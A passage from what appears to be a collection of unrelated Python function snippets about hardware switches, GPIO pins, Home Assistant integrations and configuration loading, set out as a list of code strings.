monitor_mode, auto_led, deadman):\n modem.configuration[DISABLE_AUTO_LINKING].new_value = disable_auto_linking\n modem.configuration[MONITOR_MODE].new_value = monitor_mode\n modem.configuration[AUTO_LED].new_value = auto_led\n modem.configuration[DEADMAN].new_value = deadman", "def pibooth_configure(cfg):", "def __init__(\n self,\n hass,\n cl,\n name,\n lights_ct,\n lights_rgb,\n lights_xy,\n lights_brightness,\n disable_brightness_adjust,\n min_brightness,\n max_brightness,\n sleep_entity,\n sleep_state,\n sleep_colortemp,\n sleep_brightness,\n disable_entity,\n disable_state,\n initial_transition,\n ):\n self.hass = hass\n self._cl = cl\n self._name = name\n self._entity_id = \"switch.\" + slugify(f\"circadian_lighting {name}\")\n self._state = None\n self._icon = ICON\n self._hs_color = None\n self._lights_ct = lights_ct\n self._lights_rgb = lights_rgb\n self._lights_xy = lights_xy\n self._lights_brightness = lights_brightness\n self._disable_brightness_adjust = disable_brightness_adjust\n self._min_brightness = min_brightness\n self._max_brightness = max_brightness\n self._sleep_entity = sleep_entity\n self._sleep_state = sleep_state\n self._sleep_colortemp = sleep_colortemp\n self._sleep_brightness = sleep_brightness\n self._disable_entity = disable_entity\n self._disable_state = disable_state\n self._initial_transition = initial_transition\n self._attributes = {\"hs_color\": self._hs_color, \"brightness\": None}\n\n self._lights = lights_ct + lights_rgb + lights_xy + lights_brightness\n\n # Register callbacks\n dispatcher_connect(hass, CIRCADIAN_LIGHTING_UPDATE_TOPIC, self.update_switch)\n track_state_change(hass, self._lights, self.light_state_changed)\n if self._sleep_entity is not None:\n track_state_change(hass, self._sleep_entity, self.sleep_state_changed)\n if self._disable_entity is not None:\n track_state_change(hass, self._disable_entity, self.disable_state_changed)", "def update_preprocessing_gmwmi(self, new):\n self.stages[\"Preprocessing\"].config.gmwmi_seeding = new\n self.stages[\"Registration\"].config.gmwmi_seeding = new", "def _get_switch(self, switch):\n switch = self.switch_by_label(switch)\n id = self.switches[switch.label].id\n # make sure that the serial port is open\n self.assure_serial()\n # create command for the arduino and send it\n input_string = 'r' + str(id[0]) + str(id[1])\n self.serial.write(input_string.encode('ascii'))\n time.sleep(self.READ_DELAY)\n # retrieve result\n result = self.serial.readline().decode().rstrip()\n time.sleep(self.READ_DELAY)\n # store the indicators to the switch\n switch.indicators = (int(result[0]), int(result[1]))\n # raise error if the indicators show an error\n if switch.state is None:\n raise SwitchError(\"Reading the state was unsuccessful: Indicators \"\n f\"of the switch show {switch.indicators}.\")\n return switch.state", "def setup_platform(hass, config, add_devices, discovery_info=None):\n name = config.get(CONF_NAME)\n mac = config.get(CONF_MAC)\n pin = config.get(CONF_PIN)\n\n add_devices([ProgtimeSwitch(mac, pin, name)])", "def set_bootloader_mode(self, mode):\n self.check_validity()\n\n mode = int(mode)\n\n return self.ipcon.send_request(self, BrickletIndustrialDualAnalogInV2.FUNCTION_SET_BOOTLOADER_MODE, (mode,), 'B', 9, 'B')", "def software_load(self, filename: str) -> None:\n pass # Most boards can use serialboot.", "def setup():\n GPIO.setmode(GPIO.BCM)\n for pin in [config.gpio_pin_p1_stretch,\n config.gpio_pin_p1_serve,\n config.gpio_pin_p2_stretch,\n config.gpio_pin_p2_serve]:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n input_reader_thread = threading.Thread(target=input_reader_worker)\n input_reader_thread.setDaemon(True)\n input_reader_thread.start()", "def wirebomb_config_load(self, filepath):\n scene = self.set_as_active()\n\n config = configparser.ConfigParser()\n config.read(filepath)\n\n if 'WIREFRAME TYPE' in config and 'wireframe_method' in config['WIREFRAME TYPE']:\n scene.wirebomb.wireframe_method = config['WIREFRAME TYPE']['wireframe_method']\n\n if 'CHECKBOXES' in config:\n if 'cb_backup' in config['CHECKBOXES']:\n scene.wirebomb.cb_backup = eval(config['CHECKBOXES']['cb_backup'])\n\n if 'cb_clear_rlayers' in config['CHECKBOXES']:\n scene.wirebomb.cb_clear_rlayers = eval(config['CHECKBOXES']['cb_clear_rlayers'])\n\n if 'cb_clear_materials' in config['CHECKBOXES']:\n scene.wirebomb.cb_clear_materials = eval(config['CHECKBOXES']['cb_clear_materials'])\n\n if 'cb_composited' in config['CHECKBOXES']:\n scene.wirebomb.cb_composited = eval(config['CHECKBOXES']['cb_composited'])\n\n if 'cb_only_selected' in config['CHECKBOXES']:\n scene.wirebomb.cb_only_selected = eval(config['CHECKBOXES']['cb_only_selected'])\n\n if 'cb_ao' in config['CHECKBOXES']:\n scene.wirebomb.cb_ao = eval(config['CHECKBOXES']['cb_ao'])\n\n if 'cb_clay' in config['CHECKBOXES']:\n scene.wirebomb.cb_clay = eval(config['CHECKBOXES']['cb_clay'])\n\n if 'cb_clay_only' in config['CHECKBOXES']:\n scene.wirebomb.cb_clay_only = eval(config['CHECKBOXES']['cb_clay_only'])\n\n if 'cb_mat_wire' in config['CHECKBOXES']:\n scene.wirebomb.cb_mat_wire = eval(config['CHECKBOXES']['cb_mat_wire'])\n\n if 'cb_mat_clay' in config['CHECKBOXES']:\n scene.wirebomb.cb_mat_clay = eval(config['CHECKBOXES']['cb_mat_clay'])\n\n if 'COLORS SET' in config:\n if 'color_wireframe' in config['COLORS SET']:\n scene.wirebomb.color_wire = eval(config['COLORS SET']['color_wireframe'])\n\n if 'color_clay' in config['COLORS SET']:\n scene.wirebomb.color_clay = eval(config['COLORS SET']['color_clay'])\n\n if 'MATERIALS SET' in config:\n if 'wireframe' in config['MATERIALS SET']:\n if config['MATERIALS SET']['wireframe'] in bpy.data.materials:\n scene.wirebomb.material_wire = config['MATERIALS SET']['wireframe']\n\n if 'clay' in config['MATERIALS SET']:\n if config['MATERIALS SET']['clay'] in bpy.data.materials:\n scene.wirebomb.material_clay = config['MATERIALS SET']['clay']\n\n if 'SLIDERS' in config:\n if 'slider_wt_freestyle' in config['SLIDERS']:\n scene.wirebomb.slider_wt_freestyle = eval(config['SLIDERS']['slider_wt_freestyle'])\n\n if 'slider_wt_modifier' in config['SLIDERS']:\n scene.wirebomb.slider_wt_modifier = eval(config['SLIDERS']['slider_wt_modifier'])\n\n if 'LAYERS SELECTED' in config:\n if 'layers_affected' in config['LAYERS SELECTED']:\n scene.wirebomb.layers_affected = eval(config['LAYERS SELECTED']['layers_affected'])\n\n if 'layers_other' in config['LAYERS SELECTED']:\n scene.wirebomb.layers_other = eval(config['LAYERS SELECTED']['layers_other'])\n\n if 'SCENE NAME SET' in config:\n if 'scene_name_1' in config['SCENE NAME SET']:\n scene.wirebomb.scene_name_1 = config['SCENE NAME SET']['scene_name_1']", "def setup_platform(hass, config, add_devices_callback, discovery_info=None):\n host = config.get(CONF_HOST)\n name = config.get(CONF_NAME)\n token = config.get('token')\n\n add_devices_callback([MiroboSwitch(name, host, token)])", "def save_switch_configs(self):", "def platform_config_update(config):\n global remote_port_map\n config[\"port_map\"] = remote_port_map.copy()\n config[\"caps_table_idx\"] = 0", "def load(self, identifier):\n if identifier == \"PIPISTRELLO_DEFAULT\":\n get_pipistrello_default(self)\n self.print_log(1, \"LOADED DEFAULT PIPISTRELLO\")\n else:\n raise NameError(\"Desired setup not found in load() or devices.py: \" + identifier)", "def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)", "def configure(self, filename):\n print('configuring fpga with %s' % filename)\n bitfile.load(filename, self.smap)", "async def async_setup_entry(\n hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback\n) -> None:\n platform = entity_platform.async_get_current_platform()\n\n for service_name, schema, method in (\n (\"start_program\", {}, \"async_start_program\"),\n (\n \"start_zone\",\n {\n vol.Optional(\n CONF_DEFAULT_ZONE_RUN_TIME, default=DEFAULT_ZONE_RUN\n ): cv.positive_int\n },\n \"async_start_zone\",\n ),\n (\"stop_program\", {}, \"async_stop_program\"),\n (\"stop_zone\", {}, \"async_stop_zone\"),\n ):\n platform.async_register_entity_service(service_name, schema, method)\n\n data: RainMachineData = hass.data[DOMAIN][entry.entry_id]\n entities: list[RainMachineBaseSwitch] = []\n\n for kind, api_category, switch_class, switch_enabled_class in (\n (\"program\", DATA_PROGRAMS, RainMachineProgram, RainMachineProgramEnabled),\n (\"zone\", DATA_ZONES, RainMachineZone, RainMachineZoneEnabled),\n ):\n coordinator = data.coordinators[api_category]\n for uid, activity in coordinator.data.items():\n name = activity[\"name\"].capitalize()\n\n # Add a switch to start/stop the program or zone:\n entities.append(\n switch_class(\n entry,\n data,\n RainMachineActivitySwitchDescription(\n key=f\"{kind}_{uid}\",\n name=name,\n api_category=api_category,\n uid=uid,\n ),\n )\n )\n\n # Add a switch to enabled/disable the program or zone:\n entities.append(\n switch_enabled_class(\n entry,\n data,\n RainMachineActivitySwitchDescription(\n key=f\"{kind}_{uid}_enabled\",\n name=f\"{name} enabled\",\n api_category=api_category,\n uid=uid,\n ),\n )\n )\n\n # Add switches to control restrictions:\n for description in RESTRICTIONS_SWITCH_DESCRIPTIONS:\n coordinator = data.coordinators[description.api_category]\n if not key_exists(coordinator.data, description.data_key):\n continue\n entities.append(RainMachineRestrictionSwitch(entry, data, description))\n\n async_add_entities(entities)", "def _load_shift_register(ser_pin, srclk_pin, rclk_pin, binary_inputs):\n # type: (int, int, int, Iterable[bool]) -> None\n if logger.isEnabledFor(logging.DEBUG):\n # The binary_inputs may be a generator, so save all the binary_inputs\n # into a list so they can be iterated over more than once.\n binary_inputs = list(binary_inputs)\n logger.debug(\"Loading shift register using pins (SER: %s, SRCLK: %s, \"\n \"RCLK: %s) with the following values: %s\",\n ser_pin, srclk_pin, rclk_pin, binary_inputs)\n\n # Use each element in the list as binary data output\n for output_bit in binary_inputs:\n GPIO.output(ser_pin, output_bit)\n _pin_pulse(srclk_pin)\n\n # Data has been loaded, trigger the output of data\n _pin_pulse(rclk_pin)\n # This is not in a try finally so that partially loaded data is never\n # displayed", "def setup(self):\n \n # Board refers to the P1 header of the Raspberry Pi board\n GPIO.setmode(GPIO.BOARD)\n\n # Set up pin as an input with a pull up resistor to 3.3V\n GPIO.setup(self.__pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)", "def _on_config_changed(self, _):\n self._configure_pod()", "def set_bootloader_mode(self, mode):\n mode = int(mode)\n\n return self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_SET_BOOTLOADER_MODE, (mode,), 'B', 'B')", "def load(self):\n\n # address = 0\n\n # # For now, we've just hardcoded a program:\n\n # program = [\n # # From print8.ls8\n # 0b10000010, # LDI R0,8\n # 0b00000000,\n # 0b00001000,\n # 0b01000111, # PRN R0\n # 0b00000000,\n # 0b00000001, # HLT\n # ]\n\n # for instruction in program:\n # self.ram[address] = instruction\n # address += 1\n\n if len(sys.argv) != 2:\n print(\"usage: python3 ls8.py examples/filename\")\n sys.exit(1)\n\n try:\n address = 0\n\n with open(sys.argv[1]) as f:\n for line in f:\n t = line.split('#')\n n = t[0].strip()\n\n if n == '':\n continue\n\n try:\n n = int(n, 2)\n except ValueError:\n print(f\"Invalid number '{n}'\")\n sys.exit(1)\n\n self.ram[address] = n\n address += 1\n\n except FileNotFoundError:\n print(f\"File not found: {sys.argv[1]}\")\n sys.exit(2)", "def boot_config():\n # quick check to grab a config file from /boot partition.\n # this function helps users who cannot SSH/access the Pi,\n # but can access the microSD card\n if os.path.exists(BOOT_CONFIG_PATH):\n print(\"Configuration loaded from /boot directory.\")\n with open(BOOT_CONFIG_PATH) as boot_file:\n with open(CONFIG_FILE_PATH, 'w+') as config_file:\n for line in boot_file:\n config_file.write(line)", "def update(self):\n\n if len(self._data) > 0:\n if not self._switch._is_on:\n tmp = list(self._data.keys())\n\n random.shuffle(tmp)\n\n data = random.sample(tmp,1)[0]\n\n if (self._state == data):\n random.shuffle(tmp)\n random.shuffle(tmp)\n data = random.sample(tmp, 1)[0]\n\n self._state = self._data[data]\n \n self._now_key = data\n self._now_val = self._data[data]\n\n return\n\n self._api.load_file()\n\n self._data = self._api._data\n\n tmp = list(self._data.keys())\n\n random.shuffle(tmp)\n data = random.sample(tmp,1)[0]\n\n if (self._state == data):\n random.shuffle(tmp)\n random.shuffle(tmp)\n data = random.sample(tmp,1)[0]\n\n self._state = self._data[data]\n \n self._now_key = data\n self._now_val = self._data[data]", "async def initialize(self, hw_initialization: bool = True):\n self.num_pump_connected = await self._assign_pump_address()\n if hw_initialization:\n await self._hw_init()", "def _set_switch(self, switch, state):\n switch = self.switch_by_label(switch)\n id = self.switches[switch.label].id\n # make sure that the serial port is open\n self.assure_serial()\n # create command for the arduino and send it\n input_string = str(id[0]) + str(id[1]) + str(state)\n self.serial.write(input_string.encode('ascii'))\n time.sleep(self.WRITE_DELAY)\n # read switch after setting it, to confirm switching\n try:\n self._get_switch(switch)\n except SwitchError:\n raise SwitchError(\"Reading switch after switching was \"\n \"unsuccessful: Indicators of the switch show \"\n f\"{switch.indicators}.\")\n # raise error, if the switching was not successful\n if switch.state != state:\n raise SwitchError(\"Setting the switch was unsuccessful. The \"\n f\"switch should be in state {state}, but \"\n f\"the indicators show state {switch.state}.\")", "def load(self):\n # copy defaults\n self.config = dict(**self.DEFAULTS)\n # read configuration\n savedconfig = Blender.Registry.GetKey(self.CONFIG_NAME, True)\n # port config keys from old versions to current version\n try:\n self.config[\"IMPORT_TEXTURE_PATH\"] = savedconfig[\"TEXTURE_SEARCH_PATH\"]\n except:\n pass\n try:\n self.config[\"IMPORT_FILE\"] = Blender.sys.join(\n savedconfig[\"NIF_IMPORT_PATH\"], savedconfig[\"NIF_IMPORT_FILE\"])\n except:\n pass\n try:\n self.config[\"EXPORT_FILE\"] = savedconfig[\"NIF_EXPORT_FILE\"]\n except:\n pass\n try:\n self.config[\"IMPORT_REALIGN_BONES\"] = savedconfig[\"REALIGN_BONES\"]\n except:\n pass\n try:\n if self.config[\"IMPORT_REALIGN_BONES\"] == True:\n self.config[\"IMPORT_REALIGN_BONES\"] = 1\n elif self.config[\"IMPORT_REALIGN_BONES\"] == False:\n self.config[\"IMPORT_REALIGN_BONES\"] = 0\n except:\n pass\n try:\n if savedconfig[\"IMPORT_SKELETON\"] == True:\n self.config[\"IMPORT_SKELETON\"] = 1\n elif savedconfig[\"IMPORT_SKELETON\"] == False:\n self.config[\"IMPORT_SKELETON\"] = 0\n except:\n pass\n # merge configuration with defaults\n if savedconfig:\n for key, val in self.DEFAULTS.iteritems():\n try:\n savedval = savedconfig[key]\n except KeyError:\n pass\n else:\n if isinstance(savedval, val.__class__):\n self.config[key] = savedval\n # store configuration\n Blender.Registry.SetKey(self.CONFIG_NAME, self.config, True)\n # special case: set log level here\n self.update_log_level(\"LOG_LEVEL\", self.config[\"LOG_LEVEL\"])", "async def test_switch(\n hass: HomeAssistant, mock_bridge_v2, v2_resources_test_data\n) -> None:\n await mock_bridge_v2.api.load_test_data(v2_resources_test_data)\n\n await setup_platform(hass, mock_bridge_v2, \"switch\")\n # there shouldn't have been any requests at this point\n assert len(mock_bridge_v2.mock_requests) == 0\n # 2 entities should be created from test data\n assert len(hass.states.async_all()) == 2\n\n # test config switch to enable/disable motion sensor\n test_entity = hass.states.get(\"switch.hue_motion_sensor_motion\")\n assert test_entity is not None\n assert test_entity.name == \"Hue motion sensor Motion\"\n assert test_entity.state == \"on\"\n assert test_entity.attributes[\"device_class\"] == \"switch\"", "def init_led():\r\n global led\r\n led = LED(LED_GPIO_PIN)\r\n led.off()", "def load(self):\n\n address = 0\n\n # For now, we've just hardcoded a program:\n\n program = [\n # From print8.ls8\n 0b10000010, # LDI R0,8\n 0b00000000,\n 0b00001000,\n 0b01000111, # PRN R0\n 0b00000000,\n 0b00000001, # HLT\n ]\n\n for instruction in program:\n self.ram[address] = instruction\n address += 1", "def setup_platform(hass, config, add_devices_callback, discovery_info=None):\n add_devices_callback([\n HE853Switch('OviSwitch', STATE_ON),\n HE853Switch('AC', STATE_OFF)\n ])", "def read_switch(self):\n return GPIO.input(SWITCH_PIN)", "def load(self):\n\n address = 0\n\n # For now, we've just hardcoded a program:\n\n program = [\n # From print8.ls8\n 0b10000010, # LDI R0,8\n 0b00000000,\n 0b00001000,\n 0b01000111, # PRN R0\n 0b00000000,\n 0b00000001, # HLT\n ]\n\n for instruction in program:\n self.ram[address] = instruction\n address += 1", "def switch_features_handler(self, ev):\n\n super(RyuRest, self).switch_features_handler(ev) # Call the original switch features method\n datapath = ev.msg.datapath\n self.switches[datapath.id] = datapath\n self.mac_to_port.setdefault(datapath.id, {})", "def set_switch_config(self, config_flags, miss_send_len):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n self.logger.info(\"Setting config on switch \"\n \"dpid=%s to config_flags flag=%s and \"\n \"miss_send_len=%s bytes\",\n self.dpid, config_flags, miss_send_len)\n try:\n self.datapath.send_msg(parser.OFPSetConfig(\n self.datapath,\n config_flags,\n miss_send_len))\n except:\n #*** Log the error and return 0:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Failed to set switch config. \"\n \"Exception %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n return 0\n return 1", "def get_switch(self, conf, dpid):\n\t\tpass", "def set_switch(self, values):\n for label, val in values.items():\n # if label is not a label, get the according label\n if isinstance(label, (ArduinoSwitchControlSwitch,\n ArduinoSwitchControlConnector)):\n label = label.label\n # if switch label, get the parameter to switch the switch\n if label in self.switches:\n par = self.parameters[f'switch_{label}_mode']\n # if input label, get the parameter to set a route from this input\n elif label in self.inputs:\n par = self.parameters[f'route_{label}_mode']\n # if parameter name, get the right parameter\n elif label.startswith('switch_'):\n if label[7:] not in [str(lab) for lab in self.switches]:\n raise SwitchError(f\"No switch with label {label[7:]}\")\n par = self.parameters[f'{label}_mode']\n elif label.startswith('route_'):\n if label[6:] not in [str(lab) for lab in self.inputs]:\n raise ConnectorError(f\"No input with label {label[6:]}\")\n if f'{label}_mode' not in self.parameters:\n raise RouteError(f\"No route starting at input {label[6:]}\")\n par = self.parameters[f'{label}_mode']\n else:\n raise ValueError(f\"parameter label {label} not recognized.\")\n\n # apply selected parameter for switching\n par(val)", "def load_config(self):\n if self.get_vrps():\n self.process_vrps()", "def update_from_file(self):\n config_path = os.environ.get('MINDINSIGHT_CONFIG', '')\n if not config_path:\n return\n\n config_module = None\n\n # python:full.path.for.config.module\n if config_path.startswith('python:'):\n config_module = import_module(config_path[len('python:'):])\n\n # file:full/path/for/config.py\n elif config_path.startswith('file:'):\n config_path = config_path[len('file:'):]\n module_name = '__mindinsightconfig__'\n config_module = types.ModuleType(module_name)\n machinery = import_module('importlib.machinery')\n loader = machinery.SourceFileLoader(module_name, config_path)\n loader.exec_module(config_module)\n\n if config_module is None:\n return\n\n for setting in dir(config_module):\n if setting.isupper() and setting in self._default_settings:\n setting_value = getattr(config_module, setting)\n setattr(self, setting, setting_value)\n self._explicit_settings.add(setting)", "def setup():\n GPIO.setmode(GPIO.BCM)\n for pin in [CHURCH, CHURCH + 1, HALL, HALL + 1]:\n GPIO.setup(pin, GPIO.OUT, initial=GPIO.HIGH)", "def __init__(self,\n device_name,\n create_device_func,\n props,\n hub_name_prop,\n primary_port_prop,\n secondary_port_prop,\n ethernet_switch_prop,\n ethernet_port_prop,\n get_switchboard_if_initialized,\n power_and_data_share_cable=False,\n pre_off_func=None):\n super().__init__(device_name=device_name)\n\n self._create_device_func = create_device_func\n self._hub_name_prop = hub_name_prop\n self._primary_port_prop = primary_port_prop\n self._secondary_port_prop = secondary_port_prop\n self._props = props\n self._ethernet_switch = None\n\n # Set the properties\n self._get_switchboard_if_initialized = get_switchboard_if_initialized\n self._power_and_data_share_cable = power_and_data_share_cable\n self._pre_off_func = pre_off_func\n self._ethernet_switch_prop = ethernet_switch_prop\n self._ethernet_port_prop = ethernet_port_prop", "def on(config: dict):\n switch_device(config, config[\"inching\"], \"on\")", "def load_device():", "def settings_load(self):\n self.ui.spinBox_ATSP.setValue(self.default['ATSP'])\n\n if self.default['serialLabel'] == 'bt':\n self.ui.btRadio.setChecked(True)\n try:\n os.system(\"blueman-manager\")\n except:\n print \"Please install 'blueman' package\"\n elif self.default['serialLabel'] == 'usb':\n self.ui.usbRadio.setChecked(True)\n else:\n self.ui.devRadio.setChecked(True)\n\n if self.default['units'] == 'metric':\n self.ui.units_metric_radio.setChecked(True)\n else:\n self.ui.units_US_radio.setChecked(True)\n\n return", "def enable_setup(self):\n self.high_ver_entry.config(state=\"normal\")\n self.low_ver_entry.config(state=\"normal\")\n self.left_hor_entry.config(state=\"normal\")\n self.right_hor_entry.config(state=\"normal\")", "def presetRead():\n\n global preset_sw \n \n while True:\n for i in range(6):\n preset_sw[i][1] = GPIO.input(preset_sw[i][0])\n sleep (1)", "def _add_to_switch(self, _switch, context):\n _network = context.current['id']\n _vlanid = context.current['provider:segmentation_id']\n\n # BRIDGE_PORT_URL = '{url_prefix}://{switch_name_or_ip}:{port}/networks/{vlan}/{network_id}/{port_id}'\n for _switchport in _switch.get('ports'):\n try:\n _request = requests.put(\n BRIDGE_PORT_URL.format(url_prefix=self.url_prefix,\n port=self.protocol_port,\n switch_name_or_ip=_switch.get('name'),\n vlan=unicode(_vlanid),\n network_id=_network,\n port_id=_switchport)\n )\n LOG.info(\n _LI('Sending PUT API Call to Switch %s'),\n _request.url\n )\n if _request.status_code != requests.codes.ok:\n LOG.error(\n _LE(\"Failed To Provision Switch %s\"), _request.text)\n raise MechanismDriverError()\n except ConnectionError:\n LOG.error(\n _LE('Failed to connect to switch %s'),\n _request.url\n )", "def set_config(self, settings='settings.json'): # called from button_set object \n self.settings['lights_on'] = self.lights_on.get()\n self.settings['lights_off'] = self.lights_off.get()\n self.settings['photo1'] = self.photo1.get()\n self.settings['photo2'] = self.photo2.get()\n self.settings['smc1'] = self.smc1.get()\n self.settings['smc2'] = self.smc2.get()\n self.settings['smc3'] = self.smc3.get()\n self.settings['smc4'] = self.smc4.get()\n self.settings['watering'] = self.watering.get()\n self.settings['cycle'] = self.cycle.get()\n settings_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), settings)\n if os.path.exists(settings_path):\n with open(settings_path, 'w') as jsonfile:\n jsonfile.write(json.dumps(self.settings, indent=4))\n self.active_changes = True # (flag) changes are active!", "def initialize_light_pins(pi, pins):\n for pin in pins:\n pi.set_mode(pin, pigpio.OUTPUT)\n pi.set_pull_up_down(pin, pigpio.PUD_DOWN)", "def _init_hardware(self):\n return", "def load(self):\n\n address = 0\n\n # For now, we've just hardcoded a program:\n\n if len(sys.argv) != 2:\n print(\"Usage: cpu.py filename\")\n sys.exit(1)\n \n filename = sys.argv[1]\n\n try:\n with open(filename) as f:\n for line in f:\n \n instruction = line.split(\"#\")[0].strip()\n \n if instruction == \"\":\n continue\n\n val = int(instruction, 2) \n\n self.ram_write(address, val)\n\n address += 1\n\n except FileNotFoundError:\n print(f\"File {filename} not found\")\n sys.exit(2)", "def load():\n\n global R, P, NP, update, update_available, region_dict\n\n loader = GoSmartParameterLoader(gosmart._prefix)\n loader.initiate()\n\n R = loader.get_regions()\n P, NP = loader.get_parameters()\n\n region_dict = loader.get_region_dict()\n\n update = gosmart.status.StatusUpdater()\n update_available = update.connect()", "def enable(self):\n if not self.tm_started:\n for name, tm in self.air_traffic_manager.items():\n logging.debug(\"Starting tm %s\" % name)\n tm.start()\n tm_started = True\n\n logging.debug(\"Enabling switch %s\" % self.name)\n self.disabled = False", "def _add_switch(self, switchdesc):\n # Check switch definition parameters\n switch_attributes = list(switchdesc.keys())\n if not set(switch_attributes).issubset(self.switch_attributes):\n raise ValueError(\n \"Switch definition: '{0}' defined in '{1}' is not supported. \"\n \"Supported switch parameters are '{2}'.\".format(\n json.dumps(switchdesc, indent=2), self._xmlfile,\n self.switch_attributes))\n for mandatory_parameter in self.switch_attributes[:2]:\n if mandatory_parameter not in switch_attributes:\n raise ValueError(\n \"A '{0}' parameter is required in switch definition: \"\n \"'{1}' defined in '{2}'.\".format(\n mandatory_parameter, json.dumps(switchdesc, indent=2),\n self._xmlfile))\n\n # Check the name of the switch is not already reserved\n switch_name = switchdesc[self.switch_attributes[0]][0]\n if switch_name in self._switches:\n raise ValueError(\n \"The switch name '{0}' defined in '{1}' is \"\n \"already used.\".format(switch_name, self._xmlfile))\n\n # Create the switch control\n switch_paths = {}\n for pathdesc in switchdesc[self.switch_attributes[1]]:\n path_name = pathdesc[self.switch_path[0]][0]\n path_boxes = [box[self.unit_attributes[0]]\n for box in pathdesc[self.switch_path[1]]]\n switch_paths[path_name] = path_boxes\n switch_keys = list(switch_paths.keys())\n control = controls[\"Enum\"](\n choices=tuple(switch_keys),\n switch_name=switch_name,\n desc=(\"Switch between paths '{0}:{1}' defined in pipeline '{2}'\"\n \".\".format(switch_name, \"-\".join(switch_keys), self.id)))\n setattr(self.inputs, switch_name, control)\n self._switches[switch_name] = switch_paths\n control.add_observer(\"value\", self._update_activation)\n control.value = switch_keys[0]", "def set_com_pins_config(set_sequential, enable_remap):\n if set_sequential:\n a4bit = 0x00\n else:\n a4bit = 0x10\n\n if enable_remap:\n a5bit = 0x20\n else:\n a5bit = 0x00\n\n send_command(0xDA)\n send_command(0x02 | a4bit | a5bit)", "def load_and_reset(self, params, device, dtype):\n self.hgn.load(params['load_path'])\n if 'reset' in params:\n if isinstance(params['reset'], list):\n for net in params['reset']:\n assert net in ['encoder', 'decoder', 'hamiltonian', 'transformer']\n else:\n assert params['reset'] in ['encoder', 'decoder', 'hamiltonian', 'transformer']\n if 'encoder' in params['reset']:\n self.hgn.encoder = loader.instantiate_encoder(params, device, dtype)\n if 'decoder' in params['reset']:\n self.hgn.decoder = loader.instantiate_decoder(params, device, dtype)\n if 'transformer' in params['reset']:\n self.hgn.transformer = loader.instantiate_transformer(params, device, dtype)\n if 'hamiltonian' in params['reset']:\n self.hgn.hnn = loader.instantiate_hamiltonian(params, device, dtype)", "def on(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self._hub.switch_power.power_on(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_on()\n time.sleep(5) # Small delay to give time for 'dev/tty' to populate\n switchboard = self._get_switchboard_if_initialized()\n if switchboard:\n switchboard.open_all_transports()", "async def async_setup_entry(hass, config_entry, async_add_devices):\n loxconfig = hass.data[DOMAIN]['loxconfig']\n identify = loxconfig['msInfo']['serialNr']\n\n devices = []\n all_dimmers = []\n all_light_controller_dimmers = []\n all_color_picker = []\n all_switches = []\n all_dimmers = get_all_dimmer(loxconfig)\n\n for light_controller in get_all_light_controller(loxconfig):\n light_controller.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n new_light_controller = LoxonelightcontrollerV2(**light_controller)\n\n if 'subControls' in light_controller:\n if len(light_controller['subControls']) > 0:\n for sub_controll in light_controller['subControls']:\n if light_controller['subControls'][sub_controll]['type'] == \"Dimmer\":\n light_controller['subControls'][sub_controll]['room'] = light_controller.get('room', '')\n light_controller['subControls'][sub_controll]['cat'] = light_controller.get('cat', '')\n light_controller['subControls'][sub_controll][\n 'lightcontroller_id'] = new_light_controller.unique_id\n all_light_controller_dimmers.append(light_controller['subControls'][sub_controll])\n\n elif light_controller['subControls'][sub_controll]['type'] == \"Switch\":\n light_controller['subControls'][sub_controll]['room'] = light_controller.get('room', '')\n light_controller['subControls'][sub_controll]['cat'] = light_controller.get('cat', '')\n light_controller['subControls'][sub_controll][\n 'lightcontroller_id'] = new_light_controller.unique_id\n all_switches.append(light_controller['subControls'][sub_controll])\n\n elif light_controller['subControls'][sub_controll]['type'] == \"ColorPickerV2\":\n light_controller['subControls'][sub_controll]['room'] = light_controller.get('room', '')\n light_controller['subControls'][sub_controll]['cat'] = light_controller.get('cat', '')\n light_controller['subControls'][sub_controll][\n 'lightcontroller_id'] = new_light_controller.unique_id\n all_color_picker.append(light_controller['subControls'][sub_controll])\n\n hass.bus.async_listen(EVENT, new_light_controller.event_handler)\n devices.append(new_light_controller)\n\n _ = all_dimmers + all_light_controller_dimmers\n\n for dimmer in _:\n if dimmer in all_light_controller_dimmers:\n dimmer.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n else:\n dimmer.update({'room': get_room_name_from_room_uuid(loxconfig, dimmer.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, dimmer.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n\n new_dimmer = 